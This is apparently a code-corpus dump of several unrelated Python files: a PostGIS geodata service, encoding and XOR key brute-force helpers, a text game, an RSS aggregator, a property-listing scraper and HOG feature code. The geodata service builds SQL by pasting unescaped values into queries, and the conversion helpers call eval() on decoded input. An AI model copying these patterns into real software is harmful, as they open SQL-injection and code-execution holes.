NotImplementedError(\"new_collection not yet implemented\")\n\n def drop_collection(self, collection_name: str):\n raise NotImplementedError(\"drop_collection not yet implemented\")\n\n def add_feature(self, collection_name: str, feature: Feature) -> str:\n raise NotImplementedError(\"add_feature not yet 
implemented\")\n\n def add_features(self, collection_name: str, features: Sequence[Feature]) -> str:\n raise NotImplementedError(\"new_collection not yet implemented\")\n\n # noinspection PyMethodMayBeStatic\n def _get_collection(self, collection_name: str):\n source_path = os.path.normpath(os.path.join(os.path.dirname(__file__), '..', 'geodb'))\n file_path = os.path.join(source_path, collection_name + '.geojson')\n if os.path.isfile(file_path):\n return fio.open(file_path)\n else:\n raise FileNotFoundError(f\"Could not find file {collection_name}.geojson\")\n\n\n# noinspection SqlNoDataSourceInspection,PyMethodMayBeStatic\nclass RemoteGeoPostgreSQLService(GeoDBService):\n _FILTER_SQL = (\"SELECT json_build_object(\\n\"\n \" 'type', 'Feature',\\n\"\n \"\t 'properties', properties::json,\\n\"\n \" 'geometry', ST_AsGeoJSON(geometry)::json\\n\"\n \" )\\n\"\n \" FROM \\\"{table_prefix}{collection}\\\" \\n\"\n \" WHERE {query} {max}\")\n\n _FILTER_LONG_SQL = (\"SELECT *\\n\"\n \" FROM \\\"{table_prefix}{collection}\\\" \\n\"\n \" WHERE {query} {max}\")\n\n _GET_TABLES_SQL = (\"SELECT t.table_name\\n\"\n \" FROM information_schema.tables t\\n\"\n \" INNER JOIN information_schema.columns c on c.table_name = t.table_name \\n\"\n \" and c.table_schema = t.table_schema\\n\"\n \" WHERE c.column_name = 'properties'\\n\"\n \" AND t.table_schema not in ('information_schema', 'pg_catalog')\\n\"\n \" AND t.table_type = 'BASE TABLE'\\n\"\n \" \\n\"\n \" ORDER BY t.table_schema;\")\n\n _TABLE_EXISTS_SQL = (\"SELECT EXISTS (\\n\"\n \" SELECT 1\\n\"\n \" FROM information_schema.tables\\n\"\n \" WHERE table_schema = 'public'\\n\"\n \" AND table_name = '{table_prefix}{collection}')\")\n\n _DROP_COLLECTION_SQL = \"DROP TABLE {table_prefix}{collection}\"\n\n _CREATE_COLLECTION_SQL = (\"\\n\"\n \" -- Table: public.{table_prefix}{collection}\\n\"\n \"\\n\"\n \" -- DROP TABLE public.{table_prefix}{collection};\\n\"\n \" \\n\"\n \" CREATE TABLE public.{table_prefix}{collection}\\n\"\n \" (\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"id integer NOT NULL DEFAULT nextval('{table_prefix}id_seq1'::regclass),\\n\"\n \" -- Inherited from table public.{table_prefix}master: properties json,\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"name character varying(512) COLLATE pg_catalog.\\\"default\\\",\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"geometry geometry,\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"type character varying COLLATE pg_catalog.\\\"default\\\" NOT NULL\\n\"\n \" {columns}\\n\"\n \" )\\n\"\n \" INHERITS (public.{table_prefix}master)\\n\"\n \" WITH (\\n\"\n \" OIDS = FALSE\\n\"\n \" )\\n\"\n \" TABLESPACE pg_default;\\n\"\n \" \\n\"\n \" ALTER TABLE public.{table_prefix}{collection}\\n\"\n \" OWNER to postgres;\\n\"\n \" \")\n\n _GET_SRID_SQL = \"SELECT ST_SRID(geometry) FROM {collection} LIMIT 1;\"\n\n _TABLE_PREFIX = ''\n\n def __init__(self, host: str, user: Optional[str] = None, password: Optional[str] = None, port: int = 5432,\n conn: object = None):\n \"\"\"\n\n :param host: Host of database\n :param user: user name\n :param password: password\n :param port: port (default: 5432)\n \"\"\"\n super().__init__()\n\n if not user:\n user = os.getenv(\"PSQL_USER\")\n if not password:\n password = os.getenv(\"PSQL_PASSWD\")\n\n if conn:\n self._conn = conn\n else:\n self._conn = psycopg2.connect(f\"host={host} port={port} user={user} password={password}\")\n\n self._collections = self._get_collections()\n 
self._sql = None\n\n @property\n def collections(self) -> Optional[Sequence[str]]:\n return self._collections\n\n @property\n def sql(self) -> str:\n return self._sql\n\n def find_feature(self, collection_name: str, query: str, fmt: str = 'geojson', bbox: BBox = None,\n bbox_mode: str = 'contains', bbox_crs: int = 4326) -> Optional[Feature]:\n features = self.find_features(collection_name, query, bbox=bbox, fmt=fmt, bbox_mode=bbox_mode, max_records=1)\n return features[0] if features else None\n\n def _get_srid_from_collection(self, collection_name: str) -> str:\n sql = self._GET_SRID_SQL.format(collection=collection_name)\n result = self.query(sql=sql)\n return result[0]\n\n def _alter_query(self, query, bbox, bbox_mode, fmt, srid: int = None):\n bbox_query = None\n if bbox:\n minx = bbox[0]\n miny = bbox[1]\n maxx = bbox[2]\n maxy = bbox[3]\n\n srid_str = ''\n if srid is not None:\n srid_str = f'SRID={srid};'\n\n bbox = f\" {srid_str}POLYGON(({minx} {miny},{minx} {maxy},{maxx} {maxy},{maxx} {miny},{minx} {miny}))\" \\\n f\"::geometry\"\n if bbox_mode == 'contains':\n bbox_query = f\" ST_Contains('{bbox}', geometry)\"\n elif bbox_mode == 'within':\n bbox_query = f\" ST_Within('{bbox}', geometry)\"\n else:\n raise ValueError(f\"bbox_mode {bbox_mode} unknown\")\n\n if not query and not bbox_query:\n query = 'TRUE'\n elif query and not bbox_query:\n if fmt == 'geojson':\n query = f\"properties->>{query}\"\n elif fmt == 'geopandas':\n query = f\"{query}\"\n else:\n raise ValueError(f\"format {fmt} not known\")\n elif not query and bbox_query:\n query = bbox_query\n elif query and bbox_query:\n if fmt == 'geojson':\n query = f\"properties->>{query} and {bbox_query}\"\n elif fmt == 'geopandas':\n query = f\"{query} and {bbox_query}\"\n else:\n raise ValueError(f\"format {fmt} not known\")\n return query\n\n def find_features(self, collection_name: str, query: str = None, max_records: int = -1, fmt: str = 'geopandas',\n bbox: BBox = None, bbox_mode: str = 'contains', bbox_crs: int = 4326) -> \\\n Union[Sequence[Feature], gpd.GeoDataFrame]:\n if not self._collection_exists(collection_name=collection_name):\n raise ValueError(f\"Collection {collection_name} not found\")\n\n limit = ''\n if max_records > -1:\n limit = 'LIMIT ' + str(max_records)\n\n query = self._alter_query(query=query, bbox=bbox, bbox_mode=bbox_mode, fmt=fmt, srid=bbox_crs)\n\n if fmt == 'geojson':\n self._sql = self._FILTER_SQL.format(collection=collection_name, max=limit, query=query,\n table_prefix=self._TABLE_PREFIX)\n cursor = self._conn.cursor()\n cursor.execute(self._sql)\n\n result_set = []\n for f in cursor.fetchall():\n result_set.append(f[0])\n return result_set\n elif fmt == 'geopandas':\n self._sql = self._FILTER_LONG_SQL.format(collection=collection_name, max=limit, query=query,\n table_prefix=self._TABLE_PREFIX)\n result = gpd.GeoDataFrame.from_postgis(self._sql, self._conn, geom_col='geometry')\n if result.empty:\n result = gpd.GeoDataFrame({'Message': ['empty result']})\n return result\n else:\n raise ValueError(f\"format {fmt} unknown\")\n\n def new_collection(self, collection_name: str, schema: Schema) -> str:\n if self._collection_exists(collection_name):\n raise ValueError(f\"Collection {collection_name} exists\")\n\n columns = []\n for k, v in schema['properties'].items():\n columns.append(self._make_column(k, v))\n\n sql = self._CREATE_COLLECTION_SQL.format(collection=collection_name, columns=',\\n'.join(columns),\n table_prefix=self._TABLE_PREFIX)\n self.query(sql)\n\n return \"Collection created\"\n\n def 
drop_collection(self, collection_name: str):\n if not self._collection_exists(collection_name=collection_name):\n raise ValueError(f\"Collection {collection_name} does not exist\")\n\n sql = self._DROP_COLLECTION_SQL.format(collection=collection_name, table_prefix=self._TABLE_PREFIX)\n self.query(sql=sql)\n\n def add_feature(self, collection_name: str, feature: Feature) -> str:\n self.add_features(collection_name, [feature])\n return \"Feature Added\"\n\n def add_features(self, collection_name: str, features: Sequence[Feature]) -> str:\n for f in features:\n\n _local = f['properties'].keys()\n columns = []\n for c in _local:\n columns.append(f'\"{c.lower()}\"')\n\n _local = f['properties'].values()\n values = []\n for v in _local:\n if isinstance(v, float) or isinstance(v, int) or isinstance(v, bool):\n values.append(f\"{v}\")\n elif v is None:\n values.append(f\"null\")\n else:\n values.append(f\"'{str(v)}'\")\n\n columns = ','.join(columns)\n values = ','.join(values)\n geometry = f['geometry']\n properties = f['properties']\n\n sql = f\"INSERT INTO {self._TABLE_PREFIX}{collection_name}(properties, name, {columns}, geometry) \" \\\n f\"VALUES('{json.dumps(properties)}', '{properties['S_NAME']}', {values}, \" \\\n f\"ST_GeomFromGeoJSON('{json.dumps(geometry)}')) \"\n self.query(sql=sql)\n return \"Features Added\"\n\n def query(self, sql: str) -> Optional[Any]:\n \"\"\"\n\n Args:\n sql: The raw SQL statement in PostgreSQL dialect\n\n Returns:\n A list of tuples if the number of returned rows is larger than one or a single tuple otherwise, or\n nothing if the query is not a SELECT statement\n\n\n \"\"\"\n cur = self._conn.cursor()\n cur.execute(sql)\n\n if \"SELECT\" in sql:\n if cur.rowcount == 1:\n result = cur.fetchone()\n else:\n result = cur.fetchall()\n else:\n self._conn.commit()\n result = True\n\n cur.close()\n return result\n\n def _get_collections(self):\n result = self.query(self._GET_TABLES_SQL)\n return [r[0] for r in result]\n\n def _collection_exists(self, collection_name: str):\n sql = self._TABLE_EXISTS_SQL.format(collection=collection_name, table_prefix=self._TABLE_PREFIX)\n return self.query(sql)[0]\n\n def _make_column(self, name: str, typ: str):\n if typ == 'str':\n col_create_str = f'{name} character varying(256) COLLATE pg_catalog.\"default\"'\n elif 'int' in typ:\n col_create_str = f'{name} integer'\n elif 'float' in typ:\n prec_str = \"\"\n _local = typ.split(':')\n if len(_local) == 2:\n _local = _local[1].split('.')\n if len(_local) == 2:\n prec_str = f\"({_local[0]},{_local[1]})\"\n col_create_str = f'{name} numeric{prec_str}'\n else:\n raise NotImplementedError(f\"Column type {typ} not implemented\")\n\n return col_create_str\n\n def _make_insert_column(self, name: str, typ: str):\n if typ == 'str':\n col_create_str = f'{name} character varying(256) COLLATE pg_catalog.\"default\"'\n elif 'int' in typ:\n col_create_str = f'{name} integer'\n elif 'float' in typ:\n prec_str = \"\"\n _local = typ.split(':')\n if len(_local) == 2:\n _local = _local[1].split('.')\n if len(_local) == 2:\n prec_str = f\"({_local[0]},{_local[1]})\"\n col_create_str = f'{name} numeric{prec_str}'\n else:\n raise NotImplementedError(f\"Column type {typ} not implemented\")\n\n return col_create_str\n\n\ndef get_geo_db_service(driver: str = 'local', **kwargs) -> GeoDBService:\n \"\"\"\n\n :param driver: \n :param kwargs: Parameter for subsequence service\n :return:\n \"\"\"\n if driver == 'local':\n return LocalGeoDBService()\n else:\n return 
RemoteGeoPostgreSQLService(**kwargs)\n\n","sub_path":"xcube_sh/geodb.py","file_name":"geodb.py","file_ext":"py","file_size_in_byte":19765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"160284594","text":"#Nik and Cam\r\n#Base conversions\r\n\r\nimport base64\r\nimport codecs\r\nimport math\r\n\r\ndef bin2Hex(st):\r\n return hex(int(st, 2))[2:]\r\n\r\ndef bin2Base64(st):\r\n st = bin2Hex(st)\r\n return hex2Base64(st)\r\n\r\ndef bin2Plain(st):\r\n return eval(str(codecs.decode(bin2Hex(st), \"hex\"))[1:])\r\n\r\ndef hex2Bin(st):\r\n return bin(int(st, 16))[2:]\r\n\r\ndef hex2Base64(st):\r\n return codecs.encode(codecs.decode(st, 'hex'), 'base64').decode().replace(\"\\n\", \"\")\r\n\r\ndef hex2Plain(st):\r\n if len(st) % 2 != 0:\r\n st = '0' + st\r\n return eval(str(codecs.decode(st, \"hex\"))[1:])\r\n # print(st)\r\n\r\ndef base642Bin(st):\r\n hexSt = base642Hex(st)\r\n return hex2Bin(hexSt)\r\n\r\ndef base642Hex(st):\r\n return base64.b64decode(st).hex()\r\n\r\ndef base642Plain(st):\r\n hexSt = base642Hex(st)\r\n return hex2Plain(hexSt)\r\n\r\ndef plain2Bin(st):\r\n b = st.encode()\r\n return hex2Bin(codecs.encode(b, \"hex\"))\r\n\r\ndef plain2Hex(st):\r\n b = st.encode()\r\n return str(codecs.encode(b, \"hex\"))[2:-1]\r\n\r\ndef plain2Base64(st):\r\n hexSt = plain2Hex(st)\r\n return hex2Base64(hexSt) \r\n\r\n## ENCRYPT/DECRYPT\r\ndef k_decrypt(hex_str, key_lst):\r\n\r\n str_len = math.ceil(len(hex_str)/(len(key_lst[0])))\r\n # print(str_len)\r\n ret_lst = []\r\n\r\n for i in key_lst:\r\n temp_key = \"\"\r\n for j in range(str_len):\r\n temp_key += i\r\n # print(len(hex_str), len(temp_key))\r\n ret_lst.append([reverse_b_xor(hex_str, temp_key[:len(hex_str)]), i])\r\n\r\n return ret_lst\r\n\r\ndef reverse_b_xor(xord, st2):\r\n\r\n lengthst2 = len(st2)\r\n lengthxord = len(xord)\r\n\r\n # print(lengthst2, lengthxord)\r\n\r\n st2, xord = hex2Bin(st2), hex2Bin(xord)\r\n if len(st2) != 4*lengthst2:\r\n diff = 4*lengthst2 - len(st2)\r\n st2 = diff * '0' + st2\r\n if len(xord) != 4*lengthxord:\r\n diff = 4*lengthxord - len(xord)\r\n xord = diff * '0' + xord\r\n # print(len(xord), len(st2))\r\n # print()\r\n\r\n if len(st2) != len(xord):\r\n return 'Input lengths not equal'\r\n\r\n st1 = ''\r\n \r\n for x in range(len(st2)):\r\n if st2[x] == '1' and xord[x] == '1':\r\n st1 += '0'\r\n elif st2[x] == '1' and xord[x] == '0':\r\n st1 += '1'\r\n elif st2[x] == '0' and xord[x] == '1':\r\n st1 += '1'\r\n elif st2[x] == '0' and xord[x] == '0':\r\n st1 += '0'\r\n else:\r\n return 'Invalid inputs'\r\n return bin2Hex(st1)\r\n\r\n#Key Generator\r\ndef allKeys(n):\r\n\r\n hex_lst = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\r\n \r\n if n == 1:\r\n return hex_lst\r\n else:\r\n return allKeysr(n, n - 1, [], hex_lst, hex_lst)\r\n\r\ndef allKeysr(n, c, new_lst, old_lst, hex_lst):\r\n if c == 0:\r\n return old_lst\r\n else:\r\n for i in range(len(old_lst)):\r\n for j in range(len(hex_lst)):\r\n new_lst.append(old_lst[i] + hex_lst[j])\r\n return allKeysr(n, c-1, [], new_lst, hex_lst)\r\n\r\n\r\ndef fltr(hex_str):\r\n # if hex_str == None:\r\n # return\r\n temp = \"\"\r\n for i in hex_str:\r\n if i.lower() in \"abcdefghijklmnopqrstuvwxyz !?,.;:_-'\\\"\":\r\n temp += i\r\n return temp\r\n\r\ndef getBasicFit(st):\r\n # if st == None:\r\n # return \r\n score = 0\r\n for i in st:\r\n letter = i.lower()\r\n if letter in \"zqxj\":\r\n score += 0\r\n elif letter in 'kv':\r\n score += 1\r\n elif letter in 'bpygfwmuc':\r\n score += 
2\r\n elif letter in 'ld':\r\n score += 3\r\n elif letter in 'rhsni':\r\n score += 4\r\n elif letter in 'oa':\r\n score += 5\r\n elif letter == 't':\r\n score += 6\r\n elif letter == 'e':\r\n score += 8\r\n else:\r\n score += 0\r\n return score\r\n\r\ndef getAdvFit(st):\r\n # if st == None:\r\n # return\r\n score = 0\r\n n_list = ['bx', 'cj', 'cv', 'cx', 'dx', 'fq', 'fx', 'gq', 'gx', 'hx', 'jc', 'jf', 'jg', 'jq', 'js', 'jv', 'jw', 'jx', 'jz', 'kq', 'kx', 'mx', 'px', 'pz', 'qb', 'qc', 'qd', 'qf', 'qg', 'qh', 'qj', 'qk', 'ql', 'qm', 'qn', 'qp', 'qs', 'qt', 'qv', 'qw', 'qx', 'qy', 'qz', 'sx', 'vb', 'vf', 'vh', 'vj', 'vm', 'vp', 'vq', 'vt', 'vw', 'vx', 'wx', 'xj', 'xx', 'zj', 'zq', 'zx']\r\n for i in range(len(st) - 1):\r\n lt1 = st[i]\r\n lt2 = st[i + 1]\r\n if lt1.lower() + lt2.lower() in n_list or lt2.lower() + lt1.lower() in n_list:\r\n score -= 100\r\n return score\r\n\r\ndef getKey(item):\r\n return item[0][0]\r\n\r\ndef test():\r\n \r\n binStr = '11010000110010101101100011011000110111100000001'\r\n hexStr = '001fd'\r\n base64Str = 'aGVsbG8B'\r\n plainStr = \"hello\\x01\"\r\n \r\n #Test functions:\r\n # print('Binary to Test')\r\n # print(bin2Hex(binStr))\r\n # print(bin2Base64(binStr))\r\n # print(bin2Plain(binStr))\r\n # print()\r\n\r\n print('Hex to Test')\r\n # print(hex2Bin(hexStr))\r\n # print(hex2Base64(hexStr))\r\n print(hex2Plain(hexStr))\r\n # print()\r\n\r\n # print('Base64 to Test')\r\n # print(base642Bin(base64Str))\r\n # print(base642Hex(base64Str))\r\n # print(base642Plain(base64Str))\r\n # print()\r\n\r\n # print('Plain to Test')\r\n # print(plain2Bin(plainStr))\r\n # print(plain2Hex(plainStr))\r\n # print(plain2Base64(plainStr))\r\n\r\nif __name__ == \"__main__\":\r\n test()","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"104462293","text":"from room import Room\nfrom player import Player\nfrom item import Item\n\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\"),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. 
The only exit is to the south.\"\"\"),\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n# Welcome Message\n# Make a new player object that is currently in the 'outside' room.\nprint(\"Welcome to The Adventure Game!\")\nprint(\"Please create a player to continue\")\nstartPosition = room['outside']\n\nusername = input(\"Player Name: \")\nuser = Player(str(username), startPosition)\nprint(f\"Welcome {user.name}\")\n\n# Write a loop that:\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\nplayGame = input(\"Please press yes (y) to continue or (q) to quit:\")\n\nif playGame.lower().strip() == \"y\":\n print(\"Welcome to the Adventure Game! Move forward to begin the treasure hunt!\")\n\nuserInput = input(f\"You're currently {user.current_room} press (n) to move forward:\")\n\nif userInput.lower().strip() == \"n\":\n user.current_room = user.current_room.n_to\n print(user)\n\nelif userInput.lower().strip() == \"q\":\n print(\"Game exiting\")\n exit(0)\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"76355347","text":"import requests\nimport xml.etree.ElementTree as ET\nfrom db import DB\n\nclass Aggregate(object):\n def aggregate(self):\n database = DB()\n sources = database.get_sources()\n finalitems = []\n for url,category in sources:\n items = self.fetch_items(url)\n finalitems.extend(items)\n database.insert_news(items, category)\n\n print(len(finalitems))\n\n def fetch_items(self, url):\n items = []\n res = requests.get(url)\n content = res.text\n root = ET.fromstring(content)\n for child in root:\n #there is only one child for root --> channel\n for item in child.findall('item'):\n i = {}\n for elem in item:\n if elem.tag == 'title':\n i['title'] = str(elem.text).encode('utf-8').decode()\n if elem.tag == 'description':\n i['description'] = str(elem.text).encode('utf-8').decode()\n if elem.tag == 'link':\n i['link'] = str(elem.text).encode('utf-8').decode()\n if i:\n items.append(i)\n return items\n\n\nif __name__=='__main__':\n aggregator = Aggregate()\n aggregator.aggregate()\n","sub_path":"intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"318687041","text":"'''\nThis script creates dummy csv files, by selecting the first 10 images from the traindata and putting their features, filenames,\nindices and labels in separate csv files.\n@author: Diede Kemper\n'''\n\nimport pandas as pd\nimport csv\nfrom itertools import chain #to flatten lists\n\n#FEATURES\ndf = pd.read_csv('traindata_caffefeatures.csv', header=None, nrows=10)\ndf.to_csv('dummy_caffefeatures.csv', index=False, header=False) #save to csv\n\n#FILENAMES\nfilenames = list(df[0].values)\nmyfile = open('dummy_filenames.csv', 'wb')\nwr = 
csv.writer(myfile)\nwr.writerow(filenames)\n\n#INDICES\nwith open('traindata_indices.csv', 'rb') as f:\n reader = csv.reader(f)\n indices = list(reader)\n\nindices = list(chain.from_iterable(indices)) #flatten list\nindices = indices[0:10]\n\nmyfile = open('dummy_indices.csv', 'wb')\nwr = csv.writer(myfile)\nwr.writerow(indices)\n\n# LABELS\nwith open('traindata_labels.csv', 'rb') as f:\n reader = csv.reader(f)\n labels = list(reader)\n\nlabels = list(chain.from_iterable(labels)) #flatten list\nlabels = labels[0:10]\n\nmyfile = open('dummy_labels.csv', 'wb')\nwr = csv.writer(myfile)\nwr.writerow(labels)\n","sub_path":"Project2/Code/IO/code_to_create_csv_files/createDummyFiles.py","file_name":"createDummyFiles.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"319911336","text":"from urllib.request import urlopen \nfrom bs4 import BeautifulSoup \nimport pandas as pd\nimport time\n\nprop_name=[]\nlocation=[]\nprop_type=[]\ntitle_type=[]\nbedroom_no=[]\nbathroom_no=[]\nprop_size=[]\nother_info=[]\nprop_price=[]\nfail=0\n\n#To extract information of property from property page\ndef propertyfact(soup):\n prop_name.append(soup.find('h2',{\"class\":\"roboto\"}).text)\n print(str(len(prop_name))+\" \"+prop_name[-1])\n if len(prop_name)%50==0:\n time.sleep(15)\n elif len(prop_name)%100==0:\n time.sleep(60) \n elif len(prop_name)%500==0:\n time.sleep(180)\n elif len(prop_name)%1000==0:\n time.sleep(300)\n location.append(soup.find('dd',{'class':'loc_dd'}).text)\n fact=soup.find('dl',{'class':'params_dl'})\n ptype='NA'\n ttype='NA'\n bed='NA'\n bath='NA'\n size='NA'\n other='NA'\n for i in range(6):\n try:\n if fact.find_all('dt')[i].text=='Property Type':\n ptype=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Title type':\n ttype=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Bedrooms':\n bed=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Bathroom':\n bath=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Size':\n size=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Other Info':\n other=fact.find_all('dd')[i].text\n except:\n break\n prop_type.append(ptype)\n title_type.append(ttype)\n bedroom_no.append(bed)\n bathroom_no.append(bath)\n prop_size.append(size)\n other_info.append(other)\n try:\n prop_price.append(soup.find('dd',{'class':'dd-price'}).text)\n except:\n prop_price.append(\"NA\")\n#To get all links of properties on one website page \ndef propertyurl(soup):\n itemlist=soup.find('div',{'id':'list-view-ads','class':'list_view_ads'})\n propurl=[]\n for link in itemlist.find_all('h2',{'class':'list_title'}):\n for link2 in link('a'):\n propurl.append(link2.get('href',None))\n propurl.remove('https://www.mudah.my/honeypot.html')\n return propurl\n\n#To get soup file\ndef urlreader(url):\n while True:\n try:\n \n html = urlopen(url).read()\n print(\"success\")\n except:\n global fail\n fail=fail+1\n if fail>10:\n time.sleep(30)\n fail=0\n print(\"fail\")\n continue\n else:\n soup = BeautifulSoup(html, \"html.parser\")\n break\n return soup\n\n# To get url for next page until end page\ndef allpage(soup):\n test=soup.find_all('span',{'class':'non-active nohistory'})\n proppage=[]\n #print(test)\n for link in test:\n proppage.append(link.a.get('href'))\n #print(proppage)\n return proppage\n#This part is not finished yet and may error out; please try it in Jupyter first\ndef mudahscrapper(url=\"\",propertyarea=\"KL\"):\n 
url=url\n mainsoap=urlreader(url)\n \n #Get url\n firstpage=propertyurl(mainsoap)\n #Get fact\n for house in firstpage:\n factsoap=urlreader(house)\n propertyfact(factsoap)\n \n #URLs for all pages \n pagesoap=allpage(mainsoap)\n #url for each property on a certain page\n if len(pagesoap)!=0:\n for page in pagesoap:\n factsoap=urlreader(page)\n housesurl=propertyurl(factsoap)\n for house in housesurl:\n housesoap=urlreader(house)\n propertyfact(housesoap)\n \n mudahdata=pd.DataFrame({'Property Name':prop_name,'Property Location':location,\n 'Property Type':prop_type,'Title type':title_type,\n 'No of Bedroom':bedroom_no,'No of Bathroom':bathroom_no,\n 'Property Size':prop_size,'Bumi info':other_info,\n 'Property Price':prop_price})\n\n filename=propertyarea\n mudahdata.to_excel('mudahproperty-'+filename+'.xlsx', index=False) \n \n \nmudahscrapper(url=input(\"Please input your url: \"),propertyarea=input('City name: '))\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"311268727","text":"# -*- encoding: utf-8 -*-\nimport random, string\n\nPerfiles = (\n\t('Administrador', 'Administrador'),\n ('Vendedor', 'Vendedor'),\n ('Vendedor autorizado', 'Vendedor autorizado'),\n ('Cajero', 'Cajero'),\n ('Pedidos', 'Pedidos'),\n)\nColores = (\n ('f9f9f9', 'Default'),\n ('5090c1', 'Azul'),\n ('7d6eb0', 'Morado'),\n ('82af6f', 'Verde'),\n ('ff965c', 'Naranja'),\n ('e04140', 'Rojo'),\n ('ffc557', 'Amarillo'),\n ('ce6f9e', 'Rosa'),\n ('848484', 'Gris'), \n)\nEstatus_ticket = (\n ('Pendiente', 'Pendiente'),\n ('Cobrado', 'Cobrado'),\n ('Cortado', 'Cortado'),\n)\nEstatus_pedido = (\n ('Pendiente', 'Pendiente'),\n)\n\nPiezas = (\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5'),\n ('6', '6'),\n ('7', '7'),\n ('8', '8'),\n ('9', '9'),\n ('10', '10'),\n ('11', '11'),\n ('12', '12'),\n)\n\ndef randomword(length):\n return ''.join(random.choice(string.lowercase) for i in range(length))","sub_path":"project/app/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"399594770","text":"# -*- coding: utf-8 -*\n\nimport numpy as np \nimport cv2\nfrom numba import njit\nimport time\n\nNUM_SECTOR = 9\nFLT_EPSILON = 1e-07\n\n\n@njit\ndef func1(dx, dy, boundary_x, boundary_y, height, width, numChannels):\n r = np.zeros((height, width), dtype=np.float32)\n alfa = np.zeros((height, width, 2), np.int32)\n\n for j in range(1, height-1):\n for i in range(1, width-1):\n c = 0\n x = dx[j, i, c]\n y = dy[j, i, c]\n r[j, i] = np.sqrt(x*x + y*y)\n\n for ch in range(1, numChannels):\n tx = dx[j, i, ch]\n ty = dy[j, i, ch]\n magnitude = np.sqrt(tx*tx + ty*ty)\n if(magnitude > r[j, i]):\n r[j, i] = magnitude\n c = ch\n x = tx\n y = ty\n\n mmax = boundary_x[0]*x + boundary_y[0]*y\n maxi = 0\n\n for kk in range(0, NUM_SECTOR):\n dotProd = boundary_x[kk]*x + boundary_y[kk]*y\n if(dotProd > mmax):\n mmax = dotProd\n maxi = kk\n elif(-dotProd > mmax):\n mmax = -dotProd\n maxi = kk + NUM_SECTOR\n\n alfa[j, i, 0] = maxi % NUM_SECTOR\n alfa[j, i, 1] = maxi\n return r, alfa\n# gradient aggregation, based on https://blog.csdn.net/bisheng250/article/details/53672247\n@njit\ndef func2(dx, dy, boundary_x, boundary_y, r, alfa, nearest, w, k, height, width, sizeX, sizeY, p, stringSize):\n mapp = np.zeros((sizeX*sizeY*p), np.float32)\n for i in range(sizeY):\n for j in range(sizeX):\n for ii in 
range(k):\n for jj in range(k):\n if((i * k + ii > 0) and (i * k + ii < height - 1) and (j * k + jj > 0) and (j * k + jj < width - 1)):\n mapp[i*stringSize + j*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,0]\n mapp[i*stringSize + j*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,0]\n if((i + nearest[ii] >= 0) and (i + nearest[ii] <= sizeY - 1)):\n mapp[(i+nearest[ii])*stringSize + j*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,0]\n mapp[(i+nearest[ii])*stringSize + j*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,0]\n if((j + nearest[jj] >= 0) and (j + nearest[jj] <= sizeX - 1)):\n mapp[i*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,1]\n mapp[i*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,1]\n if((i + nearest[ii] >= 0) and (i + nearest[ii] <= sizeY - 1) and (j + nearest[jj] >= 0) and (j + nearest[jj] <= sizeX - 